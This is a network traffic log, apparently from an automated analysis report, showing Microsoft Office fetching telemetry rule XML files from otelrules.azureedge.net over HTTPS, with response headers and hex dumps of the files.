                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:36 UTC501INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 38 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 41 20 54 3d 22 31 22 20 45 3d 22 54 65 6c 65 6d 65 74 72 79 53 74 61 72 74 75 70 22 20 2f 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 32 22 20 52 3d 22 31 32 30 31 30 30 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 53 20 54 3d 22 33 22 20 47 3d 22 7b 62 31 36 37 36 61 63 33 2d 37 66 65 65 2d 34 34 61 39 2d 39 61 30 65 2d 64 62 62 30 62 34 39 36 65 66 61 35 7d 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120682" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <A T="1" E="TelemetryStartup" /> <R T="2" R="120100" /> <SS T="3" G="{b1676ac3-7fee-44a9-9a0e-dbb0b496efa5}" /> </S> <C T="


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      108192.168.2.44987513.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:36 UTC192OUTGET /rules/rule120601v3s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:36 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 3342
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:34 GMT
                                                                                                                                                      ETag: "0x8DC582B927E47E9"
                                                                                                                                                      x-ms-request-id: c43eeb18-901e-008f-6ecb-4567a6000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125936Z-1746fd949bdlnsqphC1EWRurw00000000140000000004xqm
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:36 UTC3342INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 31 22 20 56 3d 22 33 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 4f 53 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d 22 44 43 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120601" V="3" DC="SM" EN="Office.System.SystemHealthMetadataOS" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa="DC" xmlns=""> <RI


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      109192.168.2.44987413.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:36 UTC193OUTGET /rules/rule120602v10s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:36 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:36 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 2592
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT
                                                                                                                                                      ETag: "0x8DC582BB5B890DB"
                                                                                                                                                      x-ms-request-id: 8db94728-c01e-0034-79d1-452af6000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125936Z-1746fd949bdfg4slhC1EWR34t000000001300000000082be
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:36 UTC2592INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 30 32 22 20 56 3d 22 31 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 53 79 73 74 65 6d 2e 53 79 73 74 65 6d 48 65 61 6c 74 68 4d 65 74 61 64 61 74 61 41 70 70 6c 69 63 61 74 69 6f 6e 41 6e 64 4c 61 6e 67 75 61 67 65 22 20 41 54 54 3d 22 63 64 38 33 36 36 32 36 36 31 31 63 34 63 61 61 61 38 66 63 35 62 32 65 37 32 38 65 65 38 31 64 2d 33 62 36 64 36 63 34 35 2d 36 33 37 37 2d 34 62 66 35 2d 39 37 39 32 2d 64 62 66 38 65 31 38 38 31 30 38 38 2d 37 35 32 31 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 44 43 61 3d
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120602" V="10" DC="SM" EN="Office.System.SystemHealthMetadataApplicationAndLanguage" ATT="cd836626611c4caaa8fc5b2e728ee81d-3b6d6c45-6377-4bf5-9792-dbf8e1881088-7521" SP="CriticalBusinessImpact" DL="A" DCa=


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      110192.168.2.44987613.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:37 UTC193OUTGET /rules/rule224901v11s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:37 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:37 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 2284
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:13 GMT
                                                                                                                                                      ETag: "0x8DC582BCD58BEEE"
                                                                                                                                                      x-ms-request-id: dea1083a-301e-0051-14cb-4538bb000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125937Z-1746fd949bdkw94lhC1EWRxuz400000001d0000000006qed
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:37 UTC2284INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 32 32 34 39 30 31 22 20 56 3d 22 31 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4c 69 63 65 6e 73 69 6e 67 2e 4f 66 66 69 63 65 43 6c 69 65 6e 74 4c 69 63 65 6e 73 69 6e 67 2e 44 6f 4c 69 63 65 6e 73 65 56 61 6c 69 64 61 74 69 6f 6e 22 20 41 54 54 3d 22 63 31 61 30 64 62 30 31 32 37 39 36 34 36 37 34 61 30 64 36 32 66 64 65 35 61 62 30 66 65 36 32 2d 36 65 63 34 61 63 34 35 2d 63 65 62 63 2d 34 66 38 30 2d 61 61 38 33 2d 62 36 62 39 64 33 61 38 36 65 64 37 2d 37 37 31 39 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 43 65 6e 73 75 73 22 20 54 3d 22 55 70 6c 6f 61 64 2d 4d 65 64 69 75 6d 22
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="224901" V="11" DC="SM" EN="Office.Licensing.OfficeClientLicensing.DoLicenseValidation" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalCensus" T="Upload-Medium"


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      111192.168.2.44987713.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:38 UTC192OUTGET /rules/rule701201v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:38 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:38 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1393
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:51 GMT
                                                                                                                                                      ETag: "0x8DC582BE3E55B6E"
                                                                                                                                                      x-ms-request-id: 5bdbb5de-801e-0067-47cb-45fe30000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125938Z-1746fd949bdqpttnhC1EWRe1wg00000000w000000000bb7h
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:38 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml"


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      112192.168.2.44987913.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:38 UTC192OUTGET /rules/rule700201v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:38 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1393
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:50 GMT
                                                                                                                                                      ETag: "0x8DC582BE39DFC9B"
                                                                                                                                                      x-ms-request-id: ddb132fa-c01e-008d-18cc-452eec000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125938Z-1746fd949bdnq7x2hC1EWRpxr00000000100000000009xtg
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:39 UTC1393INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700201" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord"


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      113192.168.2.44988013.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:38 UTC192OUTGET /rules/rule700200v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:38 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1356
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                      ETag: "0x8DC582BDF66E42D"
                                                                                                                                                      x-ms-request-id: 5ce939f7-901e-00ac-7ec7-45b69e000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125938Z-1746fd949bdqpttnhC1EWRe1wg000000010g0000000050f0
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:39 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 57 6f 72 64 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 57 6f 72 64 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Word" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenWord" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      114192.168.2.44987813.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:38 UTC192OUTGET /rules/rule701200v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:39 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1356
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                      ETag: "0x8DC582BDC681E17"
                                                                                                                                                      x-ms-request-id: 55cb7248-101e-0017-4fd4-4547c7000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125939Z-1746fd949bdw2rg8hC1EWR11u400000001eg000000009e85
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:39 UTC1356INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 58 61 6d 6c 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 58 61 6d 6c 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701200" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Xaml" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenXaml" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      115192.168.2.44988113.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:39 UTC192OUTGET /rules/rule702351v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:39 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:39 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1395
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                      ETag: "0x8DC582BE017CAD3"
                                                                                                                                                      x-ms-request-id: 4ebcc1fc-101e-0028-09cb-458f64000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125939Z-1746fd949bdtlp5chC1EWRq1v40000000180000000003phb
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:39 UTC1395INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702351" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoic


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      116192.168.2.44988213.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:40 UTC192OUTGET /rules/rule702350v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:40 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:40 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1358
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                      ETag: "0x8DC582BE6431446"
                                                                                                                                                      x-ms-request-id: 0b7a0bcb-d01e-0082-68c5-45e489000000
                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                      x-azure-ref: 20241204T125940Z-1746fd949bd54zxghC1EWRzre400000001c000000000cy7t
                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                      2024-12-04 12:59:40 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 6f 69 63 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 6f 69 63 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702350" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Voice" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVoice" S="Medium" /> <F T="2">


                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                      117192.168.2.44988313.107.246.63443
                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                      2024-12-04 12:59:40 UTC192OUTGET /rules/rule701251v1s19.xml HTTP/1.1
                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                      2024-12-04 12:59:41 UTC494INHTTP/1.1 200 OK
                                                                                                                                                      Date: Wed, 04 Dec 2024 12:59:41 GMT
                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                      Content-Length: 1395
                                                                                                                                                      Connection: close
                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:41 GMT
                                                                                                                                                      ETag: "0x8DC582BDE12A98D"
                                                                                                                                                      x-ms-request-id: 2e27a562-801e-00a0-79cb-452196000000
                                                                                                                                                      x-ms-version: 2018-03-28
